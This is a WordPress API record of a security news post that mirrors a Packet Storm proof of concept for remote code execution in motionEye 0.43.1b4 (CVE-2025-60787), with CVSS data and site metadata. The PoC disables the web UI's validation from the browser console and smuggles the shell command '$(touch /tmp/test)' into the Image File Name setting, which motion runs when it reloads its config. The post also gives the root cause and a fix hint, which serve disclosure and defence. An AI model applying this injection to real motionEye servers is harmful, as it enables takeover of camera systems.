{"id":40487,"date":"2026-02-11T12:47:36","date_gmt":"2026-02-11T12:47:36","guid":{"rendered":"http:\/\/localhost\/?p=40487"},"modified":"2026-02-11T12:47:36","modified_gmt":"2026-02-11T12:47:36","slug":"motioneye-0431b4-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40487","title":{"rendered":"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369"},"content":{"rendered":"

{“lastseen”:”2026-02-11T17:49:20″,”description”:”Client-side validation in motionEye’s web UI can be bypassed via overriding the JS validation function. Arbitrary values including shell interpolation syntax can be saved into the motion config. When motion is restarted, the motion process interprets…”,”published”:”2026-02-11T00:00:00″,”modified”:”2026-02-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:215369″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-60787″],”sourceData”:”# Exploit Title: motionEye 0.43.1b4 – RCE \\n # Exploit PoC: motionEye RCE via client-side validation bypass (safe PoC)\\n # Filename: motioneye_rce_poc_edb.txt\\n # Author: prabhatverma47\\n # Date tested: 2025-05-14 (original test); prepared for submission: 2025-10-11\\n # Affected Versions: motionEye \\u003c= 0.43.1b4\\n # Tested on: Debian host running Docker; motionEye image ghcr.io\/motioneye-project\/motioneye:edge\\n # CVE(s) \/ References: MITRE\/OSV advisories referenced: CVE-2025-60787 \\n #\\n # Short description:\\n # Client-side validation in motionEye’s web UI can be bypassed via overriding the JS validation\\n # function. Arbitrary values (including shell interpolation syntax) can be saved into the\\n # motion config. When motion is restarted, the motion process interprets the config and\\n # can execute shell syntax embedded inside configuration values such as \\”image_file_name\\”.\\n #\\n # Safe PoC: creates a harmless file \/tmp\/test inside container (non-destructive).\\n #\\n # Environment setup:\\n # 1) Start the motionEye docker image:\\n # docker run -d –name motioneye -p 9999:8765 ghcr.io\/motioneye-project\/motioneye:edge\\n #\\n # 2) Verify version in logs:\\n # docker logs motioneye | grep \\”motionEye server\\”\\n # Expect: 0.43.1b4 (or \\u003c= 0.43.1b4 for vulnerable)\\n #\\n # 3) Access web UI:\\n # Open http:\/\/127.0.0.1:9999\\n # Login: admin (blank password in default\/edge image)\\n #\\n # Reproduction (manual + safe PoC):\\n # A) Bypass client-side validation in browser console:\\n # 1) Open browser devtools on the dashboard (F12 \/ Ctrl+Shift+I).\\n # 2) In the Console tab paste and run:\\n #\\n # configUiValid = function() { return true; };\\n #\\n # This forces the UI validation function to always return true and allows any value\\n # to be accepted by the UI forms.\\n #\\n # B) Safe payload (paste this into Settings \u2192 Still Images \u2192 Image File Name and Apply):\\n # $(touch \/tmp\/test).%Y-%m-%d-%H-%M-%S\\n #\\n # After applying, the PoC triggers creation of \/tmp\/test inside the motionEye container\\n # (the \\”touch\\” is executed when motion re-reads the config \/ motionctl restarts).\\n #\\n # C) Verify from host:\\n # docker exec -it motioneye ls -la \/tmp | grep test\\n #\\n # Expected result:\\n # \/tmp\/test exists (created with the permissions of the motion process).\\n #\\n # Notes \/ root cause:\\n # – UI stores un-sanitized values into camera-*.conf (e.g., picture_filename),\\n # which are later parsed by motion and interpreted as filenames \u2013 shell meta is executed.\\n # – Fix: sanitize\/whitelist filename characters (example sanitization provided in README).\\n #\\n # References:\\n # – Original PoC \\u0026 writeup: https:\/\/github.com\/prabhatverma47\/motionEye-RCE-through-config-parameter\\n # – motionEye upstream: https:\/\/github.com\/motioneye-project\/motioneye\\n # – OSV\/GHSA advisories referencing this issue (published May\u2013Oct 2025)\\n # – NVD entries: CVE-2025-60787″,”sourceHref”:”https:\/\/packetstorm.news\/download\/215369″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215369\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-11T17:49:20″,”description”:”Client-side validation in motionEye’s web UI can be bypassed via overriding the JS validation function. Arbitrary values including shell interpolation syntax can be saved into…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-40487","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40487\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-11T17:49:20″,”description”:”Client-side validation in motionEye’s web UI can be bypassed via overriding the JS validation function. Arbitrary values including shell interpolation syntax can be saved into...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40487\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-11T12:47:36+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369\",\"datePublished\":\"2026-02-11T12:47:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487\"},\"wordCount\":595,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40487#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487\",\"name\":\"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-11T12:47:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40487\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40487#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40487","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369 - zero redgem","og_description":"{“lastseen”:”2026-02-11T17:49:20″,”description”:”Client-side validation in motionEye’s web UI can be bypassed via overriding the JS validation function. Arbitrary values including shell interpolation syntax can be saved into...","og_url":"https:\/\/zero.redgem.net\/?p=40487","og_site_name":"zero redgem","article_published_time":"2026-02-11T12:47:36+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40487#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40487"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369","datePublished":"2026-02-11T12:47:36+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40487"},"wordCount":595,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40487#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40487","url":"https:\/\/zero.redgem.net\/?p=40487","name":"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-11T12:47:36+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40487#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40487"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40487#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 motionEye 0.43.1b4 Remote Code Execution_PACKETSTORM:215369"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40487"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40487\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}